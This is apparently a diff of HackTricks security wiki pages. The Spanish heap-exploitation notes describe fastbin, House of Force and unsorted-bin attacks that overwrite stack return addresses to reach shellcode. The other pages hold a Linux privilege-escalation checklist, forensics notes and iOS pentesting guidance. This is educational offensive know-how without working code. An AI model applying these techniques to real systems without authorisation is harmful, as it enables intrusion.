Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops). Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 8, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops).
Además, ese mismo trozo falso debe ser menor que av->system_mem. av->system_mem se encuentra 1848 bytes más allá. Además, ese mismo trozo falso debe ser menor que av->system\_mem. av->system\_mem se encuentra 1848 bytes más allá.
Por culpa de los nulos de \_DTOR_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila. Por culpa de los nulos de \_DTOR\_END\_ y de las pocas direcciones en la GOT, ninguna dirección de estas secciones sirven para ser sobrescritas, así que veamos como aplicar fastbin para atacar la pila.
Otra forma de ataque es redirigir el **av** hacia la pila. Otra forma de ataque es redirigir el **av** hacia la pila.
Si modificamos el size para que de 16 en vez de 8 entonces: fastbin_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila. Si modificamos el size para que de 16 en vez de 8 entonces: fastbin\_index() nos devolverá fastbins\[0] y podemos hacer uso de esto para sobreescribir la pila.
Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET Para esto no debe haber ningún canary ni valores raros en la pila, de hecho tenemos que encontrarnos en esta: 4bytes nulos + EBP + RET
Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0. Los 4 bytes nulo se necesitan que el **av** estará a esta dirección y el primero elemento de un **av** es el mutexe que tiene que valer 0.
El **av->max_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones. El **av->max\_fast** será el EBP y será un valor que nos servirá para saltarnos las restricciones.
En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode. En el **av->fastbins\[0]** se sobreescribirá con la dirección de **p** y será el RET, así se saltará a la shellcode.
Además, en **av->system_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza. Además, en **av->system\_mem** (1484bytes por encima de la posición en la pila) habrá bastante basura que nos permitirá saltarnos la comprobación que se realiza.
Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso). Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor que 8 -> Dado que hemos dicho que el size del trozo liberado es 16, en este trozo falso solo tenemos que poner un size mayor que 8 (como además la shellcode irá en el trozo liberado, habrá que poner al ppio un jmp que caiga en nops que van después del campo size del nuevo trozo falso).
@ -964,9 +964,9 @@ Además se tiene que cumplir que el trozo contiguo al liberado debe ser mayor qu
En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable). En este caso buscamos tener un puntero a un malloc que pueda ser alterable por el atacante (por ej, que el puntero esté en el stack debajo de un posible overflow a una variable).
Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48. Así, podríamos hacer que este puntero apuntase a donde fuese. Sin embargo, no cualquier sitio es válido, el tamaño del trozo falseado debe ser menor que av->max\_fast y más específicamente igual al tamaño solicitado en una futura llamada a malloc()+8. Por ello, si sabemos que después de este puntero vulnerable se llama a malloc(40), el tamaño del trozo falso debe ser igual a 48.
Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system_mem. Si por ejemplo el programa preguntase al usuario por un número podríamos introducir 48 y apuntar el puntero de malloc modificable a los siguientes 4bytes (que podrían pertenecer al EBP con suerte, así el 48 queda por detrás, como si fuese la cabecera size). Además, la dirección ptr-4+48 debe cumplir varias condiciones (siendo en este caso ptr=EBP), es decir, 8 < ptr-4+48 < av->system\_mem.
En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera. En caso de que esto se cumpla, cuando se llame al siguiente malloc que dijimos que era malloc(40) se le asignará como dirección la dirección del EBP. En caso de que el atacante también pueda controlar lo que se escribe en este malloc puede sobreescribir tanto el EBP como el EIP con la dirección que quiera.
@ -980,7 +980,7 @@ Es necesario:
* Una llamada a malloc() con el tamaño definido por el usuario * Una llamada a malloc() con el tamaño definido por el usuario
* Una llamada a malloc() cuyos datos puedan ser definidos por el usuario * Una llamada a malloc() cuyos datos puedan ser definidos por el usuario
Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int_malloc() sin necesidad de expandir el heap Lo primero que se hace es sobreescribir el size del trozo wilderness con un valor muy grande (0xffffffff), así cual quiera solicitud de memoria lo suficientemente grande será tratada en \_int\_malloc() sin necesidad de expandir el heap
Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8. Lo segundo es alterar el av->top para que apunte a una zona de memoria bajo el control del atacante, como el stack. En av->top se pondrá \&EIP - 8.
@ -988,7 +988,7 @@ Tenemos que sobreescrbir av->top para que apunte a la zona de memoria bajo el co
victim = av->top; victim = av->top;
remainder = chunck_at_offset(victim, nb); remainder = chunck\_at\_offset(victim, nb);
av->top = remainder; av->top = remainder;
@ -1006,7 +1006,7 @@ Es importante saber que el size del nuevo trozo wilderness sea más grande que l
Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado. Los trozos liberados se introducen en el bin en función de su tamaño. Pero antes de introduciros se guardan en unsorted bins. Un trozo es liberado no se mete inmediatamente en su bin sino que se queda en unsorted bins. A continuación, si se reserva un nuevo trozo y el anterior liberado le puede servir se lo devuelve, pero si se reserva más grande, el trozo liberado en unsorted bins se mete en su bin adecuado.
Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max_fast (72normalmente) y menos a MIN_LARGE_SIZE (512). Para alcanzar el código vulnerable la solicitud de memora deberá ser mayor a av->max\_fast (72normalmente) y menos a MIN\_LARGE\_SIZE (512).
Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo: Si en los bin hay un trozo del tamaño adecuado a lo que se pide se devuelve ese después de desenlazarlo:
@ -1072,4 +1072,4 @@ Consiste en mediante reservas y liberaciones sementar la memoria de forma que qu
## **References** ## **References**
* \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation_relro/index.html)\*\*\*\* * \*\*\*\*[**https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html**](https://guyinatuxedo.github.io/7.2-mitigation\_relro/index.html)\*\*\*\*

View file

@ -47,7 +47,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command) In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (3).png>) ![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (2) (2).png>)
An then use the following code An then use the following code
@ -212,7 +212,7 @@ Also, the OS usually saves a lot of information about file system changes and ba
Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it.
There are several tools that you can use for file Carving indicating them the file-types you want search for&#x20; There are several tools that you can use for file Carving indicating them the file-types you want search for
{% content-ref url="file-data-carving-recovery-tools.md" %} {% content-ref url="file-data-carving-recovery-tools.md" %}
[file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md) [file-data-carving-recovery-tools.md](file-data-carving-recovery-tools.md)
@ -229,7 +229,7 @@ For example, instead of looking for a complete file containing logged URLs, this
### Secure Deletion ### Secure Deletion
Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**. \ Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**.\
You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them. You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them.
## References ## References

View file

@ -134,7 +134,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (3).png>) ![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (2) (2).png>)
### USB Detective ### USB Detective

View file

@ -2,37 +2,36 @@
## Learning by Practice ## Learning by Practice
### [https://tryhackme.com/](https://tryhackme.com/) ### [https://www.hackthebox.eu/](https://www.hackthebox.eu) & [https://academy.hackthebox.eu/catalogue](https://academy.hackthebox.eu/catalogue)
Hackthebox has online machines to hack, it's the best place to learn by practicing. If you are new I would recommend you learning by doing retired machines following Ippsec videos.
HackTheBox academy is the new platform to learn hacking in a more guided way, also a great resource if you want to practice hacking some specific technology!
### [https://tryhackme.com/](https://tryhackme.com)
Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines. Tryhackme is a platform with virtual machines that need to be solved through walkthroughs, which is very good for beginners and normal CTFs where you self must hack into the machines.
### [https://www.root-me.org/](https://www.root-me.org/) ### [https://www.root-me.org/](https://www.root-me.org)
Rootme is another page for online hosted virtual machines to hack. Rootme is another page for online hosted virtual machines to hack.
### [https://www.vulnhub.com/](https://www.vulnhub.com/) ### [https://www.vulnhub.com/](https://www.vulnhub.com)
Vulnhub has machines to download and then to hack Vulnhub has machines to download and then to hack
### [https://www.hackthebox.eu/](https://www.hackthebox.eu/) [https://academy.hackthebox.eu/catalogue](https://academy.hackthebox.eu/catalogue) ### [https://hack.me/](https://hack.me)
Hackthebox has online machines to hack, but there are very limited in the free version.
Recently the launched their academy, but it is a bit more expensive than for example tryhackme and has less.
### [https://hack.me/](https://hack.me/)
This site seems to be a community platform This site seems to be a community platform
### [https://www.hacker101.com/](https://www.hacker101.com/) ### [https://www.hacker101.com/](https://www.hacker101.com)
free site with videos and CTFs free site with videos and CTFs
### [https://crackmes.one/](https://crackmes.one/) ### [https://crackmes.one/](https://crackmes.one)
This site has a lot of binaries for forensic learning. This site has a lot of binaries for forensic learning.
### [https://www.hackthissite.org/missions/basic/](https://www.hackthissite.org/missions/basic/) ### [https://www.hackthissite.org/missions/basic/](https://www.hackthissite.org/missions/basic/)
### [https://attackdefense.com/](https://attackdefense.com/) ### [https://attackdefense.com/](https://attackdefense.com)

View file

@ -31,14 +31,14 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] **Any unmounted drive?** * [ ] **Any unmounted drive?**
* [ ] **Any creds in fstab?** * [ ] **Any creds in fstab?**
### ****[**Installed Software**](privilege-escalation/#installed-software)**** ### [**Installed Software**](privilege-escalation/#installed-software)
* [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed** * [ ] **Check for**[ **useful software**](privilege-escalation/#useful-software) **installed**
* [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed** * [ ] **Check for** [**vulnerable software**](privilege-escalation/#vulnerable-software-installed) **installed**
### [Processes](privilege-escalation/#processes) ### [Processes](privilege-escalation/#processes)
* [ ] Is any **unknown software running**? * [ ] Is any **unknown software running**?
* [ ] Is any software with **more privileges that it should have running**? * [ ] Is any software with **more privileges that it should have running**?
* [ ] Search for **exploits for running processes** (specially if running of versions) * [ ] Search for **exploits for running processes** (specially if running of versions)
* [ ] Can you **modify the binary** of any running process? * [ ] Can you **modify the binary** of any running process?
@ -98,7 +98,7 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)? * [ ] Are [**sudo** commands **limited** by **path**? can you **bypass** the restrictions](privilege-escalation/#sudo-execution-bypassing-paths)?
* [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)? * [ ] [**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
* [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass * [ ] [**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
* [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)**** * [ ] [**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)\*\*\*\*
* [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder? * [ ] [**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder?
* [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)? * [ ] [**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
* [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)? * [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
@ -121,7 +121,7 @@ If you want to **share some tricks with the community** you can also submit **pu
### [SSH](privilege-escalation/#ssh) ### [SSH](privilege-escalation/#ssh)
* [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166) * [ ] **Debian** [**OpenSSL Predictable PRNG - CVE-2008-0166**](privilege-escalation/#debian-openssl-predictable-prng-cve-2008-0166)
* [ ] ****[**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)**** * [ ] [**SSH Interesting configuration values**](privilege-escalation/#ssh-interesting-configuration-values)
### [Interesting Files](privilege-escalation/#interesting-files) ### [Interesting Files](privilege-escalation/#interesting-files)
@ -138,14 +138,14 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne** * [ ] **Known files that contains passwords**: Use **Linpeas** and **LaZagne**
* [ ] **Generic search** * [ ] **Generic search**
### ****[**Writable Files**](privilege-escalation/#writable-files)**** ### [**Writable Files**](privilege-escalation/#writable-files)
* [ ] **Modify python library** to execute arbitrary commands? * [ ] **Modify python library** to execute arbitrary commands?
* [ ] Can you **modify log files**? **Logtotten** exploit * [ ] Can you **modify log files**? **Logtotten** exploit
* [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit * [ ] Can you **modify /etc/sysconfig/network-scripts/**? Centos/Redhat exploit
* [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)? * [ ] Can you [**write in ini, int.d, systemd or rc.d files**](privilege-escalation/#init-init-d-systemd-and-rc-d)?
### ****[**Other tricks**](privilege-escalation/#other-tricks)**** ### [**Other tricks**](privilege-escalation/#other-tricks)
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? * [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? * [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
@ -154,6 +154,6 @@ If you want to **know** about my **latest modifications**/**additions** or you h
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (1) (3).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop) [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate (from APNS)** * Signed using the **device identity certificate (from APNS)**
* **Certificate chain** includes expired **Apple iPhone Device CA** * **Certificate chain** includes expired **Apple iPhone Device CA**
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2).png>) ![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1).png>)
### Step 6: Profile Installation ### Step 6: Profile Installation

View file

@ -62,12 +62,10 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code) * [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code)
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\ If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\ \*\*\*\*If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book. Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png>) ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (1) (5).png>)
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)**** [**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*

View file

@ -88,7 +88,7 @@ There are multiple ways to define the UI in an iOS application: _storyboard_, _n
#### Info.plist #### Info.plist
The information property list or `Info.plist` is the main source of information for an iOS app. It consists of a structured file containing **key-value** pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are **expected to have** an `Info.plist` file. You can find all possible keys in the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information_property_list?language=objc). The information property list or `Info.plist` is the main source of information for an iOS app. It consists of a structured file containing **key-value** pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are **expected to have** an `Info.plist` file. You can find all possible keys in the [**Apple Developer Documentation**](https://developer.apple.com/documentation/bundleresources/information\_property\_list?language=objc).
The file might be formatted in **XML or binary (bplist)**. You can **convert it to XML** format with one simple command: The file might be formatted in **XML or binary (bplist)**. You can **convert it to XML** format with one simple command:
@ -106,10 +106,10 @@ The file might be formatted in **XML or binary (bplist)**. You can **convert it
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the `Info.plist` file by just inspecting the file or by using `grep -i <keyword> Info.plist`: Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the `Info.plist` file by just inspecting the file or by using `grep -i <keyword> Info.plist`:
* App permissions Purpose Strings: `UsageDescription` * App permissions Purpose Strings: `UsageDescription`
* Custom URL schemes: `CFBundleURLTypes` * Custom URL schemes: `CFBundleURLTypes`
* Exported/imported _custom document types_: `UTExportedTypeDeclarations` / `UTImportedTypeDeclarations` * Exported/imported _custom document types_: `UTExportedTypeDeclarations` / `UTImportedTypeDeclarations`
* App Transport Security (ATS) configuration: `NSAppTransportSecurity` * App Transport Security (ATS) configuration: `NSAppTransportSecurity`
Please refer to the mentioned chapters to learn more about how to test each of these points. Please refer to the mentioned chapters to learn more about how to test each of these points.
@ -167,7 +167,7 @@ These folders contain information that must be examined closely during applicati
* The app can disable paths by setting `NSURLIsExcludedFromBackupKey`. * The app can disable paths by setting `NSURLIsExcludedFromBackupKey`.
* **Library/Preferences/** * **Library/Preferences/**
* Used for storing properties that can **persist even after an application is restarted**. * Used for storing properties that can **persist even after an application is restarted**.
* Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE_ID].plist. * Information is saved, unencrypted, inside the application sandbox in a plist file called \[BUNDLE\_ID].plist.
* All the key/value pairs stored using `NSUserDefaults` can be found in this file. * All the key/value pairs stored using `NSUserDefaults` can be found in this file.
* **tmp/** * **tmp/**
* Use this directory to write **temporary files** that do not need to persist between app launches. * Use this directory to write **temporary files** that do not need to persist between app launches.
@ -280,7 +280,7 @@ struct CGSize {
}; };
``` ```
However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/). However, the best options to disassemble the binary are: [**Hopper**](https://www.hopperapp.com/download.html?) and [**IDA**](https://www.hex-rays.com/products/ida/support/download\_freeware/).
## Data Storage ## Data Storage
@ -334,7 +334,7 @@ The file might be formatted in **XML or binary (bplist)**. You can **convert it
### Core Data ### Core Data
[`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\ [`Core Data`](https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/CoreData/nsfetchedresultscontroller.html#//apple\_ref/doc/uid/TP40001075-CH8-SW1) is a framework for managing the model layer of objects in your application. [Core Data can use SQLite as its persistent store](https://cocoacasts.com/what-is-the-difference-between-core-data-and-sqlite/), but the framework itself is not a database.\
CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details. CoreData does not encrypt it's data by default. However, an additional encryption layer can be added to CoreData. See the [GitHub Repo](https://github.com/project-imas/encrypted-core-data) for more details.
You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support` You can find the SQLite Core Data information of an application in the path `/private/var/mobile/Containers/Data/Application/{APPID}/Library/Application Support`
@ -608,7 +608,7 @@ Many apps log informative (and potentially sensitive) messages to the console lo
5. Reproduce the problem. 5. Reproduce the problem.
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (3).png>) ![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (2) (2).png>)
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
@ -633,11 +633,11 @@ iOS includes auto-backup features that create copies of the data stored on the d
Since iOS backs up installed apps and their data, an obvious concern is whether **sensitive user data** stored by the app might **unintentionally leak through the backup**. Another concern, though less obvious, is whether **sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup**. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today. Since iOS backs up installed apps and their data, an obvious concern is whether **sensitive user data** stored by the app might **unintentionally leak through the backup**. Another concern, though less obvious, is whether **sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup**. Both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today.
A backup of a device on which a mobile application has been installed will include all subdirectories (except for `Library/Caches/`) and files in the [app's private directory](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple_ref/doc/uid/TP40010672-CH2-SW12).\ A backup of a device on which a mobile application has been installed will include all subdirectories (except for `Library/Caches/`) and files in the [app's private directory](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple\_ref/doc/uid/TP40010672-CH2-SW12).\
Therefore, **avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories**. Therefore, **avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories**.
Although all the files in `Documents/` and `Library/Application Support/` are always backed up by default, you can [exclude files from the backup](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple_ref/doc/uid/TP40010672-CH2-SW28) by calling `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey` key.\ Although all the files in `Documents/` and `Library/Application Support/` are always backed up by default, you can [exclude files from the backup](https://developer.apple.com/library/content/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html#//apple\_ref/doc/uid/TP40010672-CH2-SW28) by calling `NSURL setResourceValue:forKey:error:` with the `NSURLIsExcludedFromBackupKey` key.\
You can use the [NSURLIsExcludedFromBackupKey](https://developer.apple.com/reference/foundation/nsurl#//apple_ref/c/data/NSURLIsExcludedFromBackupKey) and [CFURLIsExcludedFromBackupKey](https://developer.apple.com/reference/corefoundation/cfurl-rd7#//apple_ref/c/data/kCFURLIsExcludedFromBackupKey) file system properties to exclude files and directories from backups. You can use the [NSURLIsExcludedFromBackupKey](https://developer.apple.com/reference/foundation/nsurl#//apple\_ref/c/data/NSURLIsExcludedFromBackupKey) and [CFURLIsExcludedFromBackupKey](https://developer.apple.com/reference/corefoundation/cfurl-rd7#//apple\_ref/c/data/kCFURLIsExcludedFromBackupKey) file system properties to exclude files and directories from backups.
{% hint style="warning" %} {% hint style="warning" %}
Therefore when checking the backup of an application you should check if **any sensitive information** is accessible and if you can **modify any sensitive behaviour** of the application by **modifying some setting of the backup** and restoring the backup Therefore when checking the backup of an application you should check if **any sensitive information** is accessible and if you can **modify any sensitive behaviour** of the application by **modifying some setting of the backup** and restoring the backup
@ -664,14 +664,14 @@ To identify if a backup is encrypted, you can check the key named "IsEncrypted"
</plist> </plist>
``` ```
In case you need to work with an encrypted backup, there are some Python scripts in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python_scripts), such as **backup_tool.py** and **backup_passwd.py**, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked. In case you need to work with an encrypted backup, there are some Python scripts in [DinoSec's GitHub repo](https://github.com/dinosec/iphone-dataprotection/tree/master/python\_scripts), such as **backup\_tool.py** and **backup\_passwd.py**, that will serve as a good starting point. However, note that they might not work with the latest iTunes/Finder versions and might need to be tweaked.
You can also use the tool [**iOSbackup**](https://pypi.org/project/iOSbackup/) to easily read and extract files from a password-encrypted iOS backup. You can also use the tool [**iOSbackup**](https://pypi.org/project/iOSbackup/) to easily read and extract files from a password-encrypted iOS backup.
#### How to modify the behaviour #### How to modify the behaviour
